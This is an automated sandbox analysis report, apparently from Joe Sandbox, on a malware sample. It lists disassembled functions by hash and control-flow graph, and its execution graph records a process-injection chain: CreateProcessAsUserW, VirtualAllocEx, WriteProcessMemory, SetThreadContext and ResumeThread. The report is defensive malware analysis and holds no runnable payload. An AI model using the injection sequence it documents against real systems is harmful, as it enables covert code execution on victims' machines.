                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3769A Relevance: .1, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c12c1215db11196b59ee979d7de98363181a755721f98afeb05d0c6b7a60c90
                                                                                                              • Instruction ID: ce4b18cdea8f121f47c72cce28fd405a3ba050d11aada8cc5ef6ef1f5f294220
                                                                                                              • Opcode Fuzzy Hash: 6c12c1215db11196b59ee979d7de98363181a755721f98afeb05d0c6b7a60c90
                                                                                                              • Instruction Fuzzy Hash: FA11E375B08214CFD7248E14D54CB6ABBA2EB84716F14812AD84AEB311D771DD51C7D0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E36DE1 Relevance: .1, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3291650405dd614c6977d5f80f2a43c9d924190ebda412900b593fb703669c13
                                                                                                              • Instruction ID: f442d9cebf7c8a3a7fe7d1be073923c06a5c3167d162b0342243f99a0ad6e129
                                                                                                              • Opcode Fuzzy Hash: 3291650405dd614c6977d5f80f2a43c9d924190ebda412900b593fb703669c13
                                                                                                              • Instruction Fuzzy Hash: CC113634C08148DBCF04BBB9D80C2ECBFB0EB1931AF50A655C08177191DF388819CBAA
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3E3D8 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 38064ec1aa2fd3c1eda677f919289c223fbfc3c53fc64b1860f0375ffa0181ba
                                                                                                              • Instruction ID: 30561de79d87df0ad75ab92b75e51ccf4dd9a1918b8e8068fb3cf2c2c14aed32
                                                                                                              • Opcode Fuzzy Hash: 38064ec1aa2fd3c1eda677f919289c223fbfc3c53fc64b1860f0375ffa0181ba
                                                                                                              • Instruction Fuzzy Hash: 9601F7313083445FD714167658186ABBE9FEFCE350F598437E506C7385DE398C0187A1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3D8C0 Relevance: .0, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 502f26c679928d57169120423b26e8cd04e83ef06c92c61675794ac34bf5b62f
                                                                                                              • Instruction ID: f3af4a80b91c0a6c60983cbf20ceda7d4f47e8b81bc245f61cac224353845dcd
                                                                                                              • Opcode Fuzzy Hash: 502f26c679928d57169120423b26e8cd04e83ef06c92c61675794ac34bf5b62f
                                                                                                              • Instruction Fuzzy Hash: 53F0F4767092089BCB158B98FC15BAE3BA6EB84326F08406BF148E7250DB328811C750
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3DF1C Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c1782a559276dc0741c0c639bea50dfb847c776d8aae3b28fc9968ad3d51115
                                                                                                              • Instruction ID: c86dc659c4ab69aad9339d28554b4c1ecd02346d825ade4befcda575e3827890
                                                                                                              • Opcode Fuzzy Hash: 0c1782a559276dc0741c0c639bea50dfb847c776d8aae3b28fc9968ad3d51115
                                                                                                              • Instruction Fuzzy Hash: 8EE0657630C259AB8F160F55AC148BF3F6BDBC9321B058016FD55D6650CB35C921E760
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3536B Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 667a3597f519c791c10279dabe6a77c28d1076142b1b35254e6838b9b538bc21
                                                                                                              • Instruction ID: c20f23b3867020de262e0fd185def61e0b6106c0ebb6183aaf8eb7aa796e654c
                                                                                                              • Opcode Fuzzy Hash: 667a3597f519c791c10279dabe6a77c28d1076142b1b35254e6838b9b538bc21
                                                                                                              • Instruction Fuzzy Hash: DFE0CD367403106FD7281639284467F6BDEDBC9228720543EA10EC7345DDB68C068750
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E352A8 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f474194e807315c3baa87e04978cfc42c80951d951a862eba082a35081696b12
                                                                                                              • Instruction ID: 684f93d76dc31c37de5456075abcb392b922138ee5c8bda6c62233f0647dc70c
                                                                                                              • Opcode Fuzzy Hash: f474194e807315c3baa87e04978cfc42c80951d951a862eba082a35081696b12
                                                                                                              • Instruction Fuzzy Hash: 3CE06D75A002149F8B10DF69D8045EEBBF4FB89310B14C46AD959D3300E7319905CB90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E35370 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76b9137d2ba1d21eef55b0fd643b541091320d086f9648b82c1ef5f8b566533e
                                                                                                              • Instruction ID: b3885e8bd6c8ae4a9c0ba037e9661f3621b094a6155c0ce6099ebfa6c013390d
                                                                                                              • Opcode Fuzzy Hash: 76b9137d2ba1d21eef55b0fd643b541091320d086f9648b82c1ef5f8b566533e
                                                                                                              • Instruction Fuzzy Hash: 4AD012353443146BD724267A6C4592BB6DEDBC9529760543EA50EC7345DDB98C0582A0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E35EFA Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 58d7ddfb761e142dca1751f9e0b2b7c861e0437f6f10a2553d833ae612815d2f
                                                                                                              • Instruction ID: 41693e42e8f700779094fcd59d4c503b2e80b129620dd39abb97d42497474500
                                                                                                              • Opcode Fuzzy Hash: 58d7ddfb761e142dca1751f9e0b2b7c861e0437f6f10a2553d833ae612815d2f
                                                                                                              • Instruction Fuzzy Hash: 86D0C237F042109FCB848B7168183ACBB63A7C4121715C076C80AC2244DB314D098701
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3A770 Relevance: .0, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction ID: 59dd263fc20385271753ee123022cdfd29d7349de0f22f9a885a475131080f2b
                                                                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction Fuzzy Hash: 27C0803314C1242AA224104F7C49DF77F4CC3C17B4D250137F55CD310054425CC141F5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3CC75 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d1761f90b1c270e5f3ec55ee3121089fec36cee5c457df76026e211afef2914
                                                                                                              • Instruction ID: 9502ddb0e752c8b3da23fa98969a744d6c5cb11bff03036cfe254d2eda2b136b
                                                                                                              • Opcode Fuzzy Hash: 4d1761f90b1c270e5f3ec55ee3121089fec36cee5c457df76026e211afef2914
                                                                                                              • Instruction Fuzzy Hash: 21D0673AB001089FDB149F98E8448DEF7B6FB98225B04C116EA15A7265C7319921DB60
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E353A7 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d3250cc96af9a9368fa8667acd5b51dec42d3b90155efdd5079d8d984bded996
                                                                                                              • Instruction ID: 3c3140371818fa6bf67776bcdc2960012188a0365cee7edeb02c95dfb6c7f1e2
                                                                                                              • Opcode Fuzzy Hash: d3250cc96af9a9368fa8667acd5b51dec42d3b90155efdd5079d8d984bded996
                                                                                                              • Instruction Fuzzy Hash: 01C02B0738000007D72020353C421B9C30DC7C006CE30603BD10ACA345C485440F8110
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E37FA0 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f99916e6fe63739a36dae25e18f780fb5a01a7a0a36c0ed5bc5f2d4e98b10942
                                                                                                              • Instruction ID: a01e4c740a5488218ddf5546c22608571e3a73574b41e0b55439ad8e7d5e79d7
                                                                                                              • Opcode Fuzzy Hash: f99916e6fe63739a36dae25e18f780fb5a01a7a0a36c0ed5bc5f2d4e98b10942
                                                                                                              • Instruction Fuzzy Hash: 8CC012351A03094E9A40BB75E94145A332BDBC1309780C920900C0A639DFB6591B47D9
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3DEE7 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f878878373476e6dcb2a5a241115a676b7b829c074d9259401f59b21df2923fc
                                                                                                              • Instruction ID: 514fc0387a1f75702259fa7000dccb8426dbf2f2dc507c521e9142a13c00ff34
                                                                                                              • Opcode Fuzzy Hash: f878878373476e6dcb2a5a241115a676b7b829c074d9259401f59b21df2923fc
                                                                                                              • Instruction Fuzzy Hash: 77D0C93014E380AFC7039B604951B097FA26F46711F05809AE6C49A0B6D2AA8814D722
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:19.7%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:4.5%
                                                                                                              Total number of Nodes:67
                                                                                                              Total number of Limit Nodes:6
                                                                                                              execution_graph 18913 298c6b8 18914 298c700 VirtualProtectEx 18913->18914 18916 298c73e 18914->18916 18917 298b778 18918 298b7bd GetThreadContext 18917->18918 18920 298b805 18918->18920 18857 511f190 18858 511f1d2 18857->18858 18859 511f1d8 GetModuleHandleW 18857->18859 18858->18859 18860 511f205 18859->18860 18861 298025b 18862 298017f 18861->18862 18863 29801b0 18862->18863 18866 29827d8 18862->18866 18869 29827d0 18862->18869 18867 2982820 VirtualProtect 18866->18867 18868 298285a 18867->18868 18868->18862 18870 2982820 VirtualProtect 18869->18870 18871 298285a 18870->18871 18871->18862 18925 298133c 18926 2981345 18925->18926 18928 29827d8 VirtualProtect 18926->18928 18929 29827d0 VirtualProtect 18926->18929 18927 2981357 18928->18927 18929->18927 18872 298d110 18873 298d150 ResumeThread 18872->18873 18875 298d181 18873->18875 18930 511f238 18932 511f24c 18930->18932 18931 511f271 18932->18931 18934 511ea70 18932->18934 18935 511f3f8 LoadLibraryExW 18934->18935 18937 511f471 18935->18937 18937->18931 18938 2980377 18940 29827d8 VirtualProtect 18938->18940 18941 29827d0 VirtualProtect 18938->18941 18939 298038b 18940->18939 18941->18939 18876 298ce88 18877 298cecd SetThreadContext 18876->18877 18879 298cf15 18877->18879 18880 298be48 18881 298be88 VirtualAllocEx 18880->18881 18883 298bec5 18881->18883 18884 2984048 18885 298406f 18884->18885 18886 29841de 18885->18886 18888 29849d1 18885->18888 18889 2984a0b 18888->18889 18890 2984e3c 18889->18890 18893 29878f0 18889->18893 18897 2987900 18889->18897 18890->18885 18895 2987900 18893->18895 18894 2987ae4 18894->18889 18895->18894 18901 2989ca8 18895->18901 18899 2987927 18897->18899 18898 2987ae4 18898->18889 18899->18898 18900 2989ca8 CreateProcessAsUserW 18899->18900 18900->18899 18902 2989d27 CreateProcessAsUserW 18901->18902 18904 2989e28 18902->18904 18942 29802e8 18943 29802a5 18942->18943 18944 29802b5 18943->18944 18945 29827d8 VirtualProtect 18943->18945 18946 29827d0 VirtualProtect 18943->18946 18945->18944 18946->18944 18909 298c1c0 18910 298c208 WriteProcessMemory 18909->18910 18912 298c25f 18910->18912

                                                                                                              Executed Functions

                                                                                                              Function 01244518 Relevance: 1.9, Strings: 1, Instructions: 686COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 96 1244518-1244539 97 1244540-1244622 96->97 98 124453b 96->98 247 1244628 call 12452a8 97->247 248 1244628 call 124529b 97->248 98->97 104 124462e-124466e 106 1244676-12446d2 104->106 107 1244670-1244671 104->107 112 12447ac-12448b2 106->112 113 12446d8-12446e7 106->113 108 1245116-124511d 107->108 139 12448b4 112->139 140 12448b9-12448e4 112->140 115 1244773-12447a5 113->115 118 12446ec-1244746 115->118 119 12447ab 115->119 126 124475d-1244769 118->126 127 1244748-1244752 118->127 119->112 131 1244770 126->131 132 124476b 126->132 129 1244754 127->129 130 1244759-124475c 127->130 129->130 130->126 131->115 132->131 139->140 142 1244946-124495c 140->142 143 12448e6-12448ef 142->143 144 124495e-1244985 142->144 145 12448f6-1244924 143->145 146 12448f1 143->146 149 12449ed-1244a09 144->149 150 1244926 145->150 151 124492b-124493c 145->151 146->145 152 1244987-1244990 149->152 153 1244a0f-1244a2a 149->153 150->151 154 1244943 151->154 155 124493e 151->155 156 1244997-12449cb 152->156 157 1244992 152->157 160 1244a31-1244a93 153->160 161 1244a2c 153->161 154->142 155->154 162 12449d2-12449e3 156->162 163 12449cd 156->163 157->156 168 1244a96 160->168 161->160 165 12449e5 162->165 166 12449ea 162->166 163->162 165->166 166->149 251 1244a97 call 1246b00 168->251 252 1244a97 call 12458b0 168->252 253 1244a97 call 1246de1 168->253 169 1244a9d-1244ad0 172 1244ad5-1244b09 169->172 173 1244ad2-1244af3 169->173 179 1244b35 172->179 180 1244b0b-1244b17 172->180 173->168 183 1244b3b-1244c58 179->183 181 1244b21-1244b31 180->181 182 1244b19-1244b1f 180->182 184 1244b33 181->184 182->184 201 1244c5e-1244ceb 183->201 184->183 207 1244cf2-1244d38 call 124d8c0 201->207 208 1244ced 201->208 211 1244d3f-1244d4c 207->211 212 1244d3a 207->212 208->207 211->201 213 1244d52-1244e4f call 124e3d8 211->213 212->211 249 1244e54 call 124f618 213->249 250 1244e54 call 124f8e8 213->250 222 1244e5a-1245115 222->108 247->104 248->104 249->222 250->222 251->169 252->169 253->169
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: f630c8d8c60a3585cc08f2c56ac76ad3f241a9a0f4723e90d843562ae151a176
                                                                                                              • Instruction ID: 4838844c5519f2e2e6427999c1fde27e1da3429cf631fdc35b94248693871053
                                                                                                              • Opcode Fuzzy Hash: f630c8d8c60a3585cc08f2c56ac76ad3f241a9a0f4723e90d843562ae151a176
                                                                                                              • Instruction Fuzzy Hash: 7072BF74E002288FDB64EF68C895BDDBBB2BF89304F5085E9D509A7251DB70AE85CF50
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 02989CA8 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 255 2989ca8-2989d33 257 2989d3e-2989d45 255->257 258 2989d35-2989d3b 255->258 259 2989d50-2989d68 257->259 260 2989d47-2989d4d 257->260 258->257 261 2989d79-2989e26 CreateProcessAsUserW 259->261 262 2989d6a-2989d76 259->262 260->259 264 2989e28-2989e2e 261->264 265 2989e2f-2989eae 261->265 262->261 264->265 272 2989ec0-2989ec7 265->272 273 2989eb0-2989eb6 265->273 274 2989ec9-2989ed8 272->274 275 2989ede 272->275 273->272 274->275
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 02989E13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: a3ee7ccf9ba8cd6279210699410924648a7db4b4e2ed9deba82346592a561d0c
                                                                                                              • Instruction ID: 439c2dc41996cfa239718ca9acd8a4b04c1946d2ed666ed2962fcbd7f1c5724f
                                                                                                              • Opcode Fuzzy Hash: a3ee7ccf9ba8cd6279210699410924648a7db4b4e2ed9deba82346592a561d0c
                                                                                                              • Instruction Fuzzy Hash: 1E512771900229DFDB20DF99C940BEDBBB5FF48314F0484AAE919B7260DB719A85CF90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01246B00 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: b8b72415cfc8e845f02ae07c4796609b05357274fc4f20bb2949b82196fc3d7f
                                                                                                              • Instruction ID: 62d9ae9c04b3eef2eac3525c88de3229c7c193fc6cf4d3fb334e207ceac5c0dd
                                                                                                              • Opcode Fuzzy Hash: b8b72415cfc8e845f02ae07c4796609b05357274fc4f20bb2949b82196fc3d7f
                                                                                                              • Instruction Fuzzy Hash: 42815874E11208DFEB18DFA9C984A9DFBF2BF89304F25C129E914AB391EB745941CB41
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01248218 Relevance: .5, Instructions: 514COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5194f7393eb68acbc14238dd2ef117bb94eaa53f17551cb3389fef9e2f8791da
                                                                                                              • Instruction ID: fbb5188197986edb1794e4a9c59ae81bc657f1e40107af7473a28eb4addb0939
                                                                                                              • Opcode Fuzzy Hash: 5194f7393eb68acbc14238dd2ef117bb94eaa53f17551cb3389fef9e2f8791da
                                                                                                              • Instruction Fuzzy Hash: EA12C170A202199FDB18DFA8C844BAEBBF6FF88344F148469E505EB355EB749D41CB90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01248840 Relevance: .4, Instructions: 441COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 297508c3a38cf7c169d2c53d8e0b34f5f7d51a32f81e949af4c1676cb64766c3
                                                                                                              • Instruction ID: 39225dfa0e63f04a898edff2844243a7fa2e40168f28abe7ba3eab02b55e6130
                                                                                                              • Opcode Fuzzy Hash: 297508c3a38cf7c169d2c53d8e0b34f5f7d51a32f81e949af4c1676cb64766c3
                                                                                                              • Instruction Fuzzy Hash: EA028F71A21109DFDB19CFA8C884AAEBBF6FF88300F148469E615AB361D770DC41CB51
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124F618 Relevance: .4, Instructions: 424COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 202c96cc8c8ba213824e00abc4df85eb4b558095fd4691d38256c81ac3f3a506
                                                                                                              • Instruction ID: 0f26e55739404d64793a1819cda6d8cde7f51e0a4320f1ab45bd6ca4d9ce82ee
                                                                                                              • Opcode Fuzzy Hash: 202c96cc8c8ba213824e00abc4df85eb4b558095fd4691d38256c81ac3f3a506
                                                                                                              • Instruction Fuzzy Hash: AFE150B3D602148FDB18DFA8C5566DDBBB1FBA4314F56C669D808A7312E73A4A42CF40
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0298C1C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 277 298c1c0-298c20e 279 298c21e-298c25d WriteProcessMemory 277->279 280 298c210-298c21c 277->280 282 298c25f-298c265 279->282 283 298c266-298c296 279->283 280->279 282->283
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0298C250
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: f1cfeb82687e1283e5751ce8418cff0a61f7c3d013705b6ddcaf723655a3f1af
                                                                                                              • Instruction ID: 4f23be41a4fc7703c6a6364915554f303959f9e2d29955e4cf2e14580f37f8be
                                                                                                              • Opcode Fuzzy Hash: f1cfeb82687e1283e5751ce8418cff0a61f7c3d013705b6ddcaf723655a3f1af
                                                                                                              • Instruction Fuzzy Hash: E02136729003499FDF10DFAAC884BDEBBF5FF48314F14842AE919A7250C778A944CBA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0298CE88 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 297 298ce88-298ced3 299 298cee3-298cf13 SetThreadContext 297->299 300 298ced5-298cee1 297->300 302 298cf1c-298cf4c 299->302 303 298cf15-298cf1b 299->303 300->299 303->302
                                                                                                              APIs
                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 0298CF06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1591575202-0
                                                                                                              • Opcode ID: 903fcb4711fd8eebb4cd55443c9c3de71ad9e4a949989dfa6ad9deb58a598af1
                                                                                                              • Instruction ID: 5160262ed27479d28ab35c26c7ada789b40681ecd39ae315d89e89f0a0cfde46
                                                                                                              • Opcode Fuzzy Hash: 903fcb4711fd8eebb4cd55443c9c3de71ad9e4a949989dfa6ad9deb58a598af1
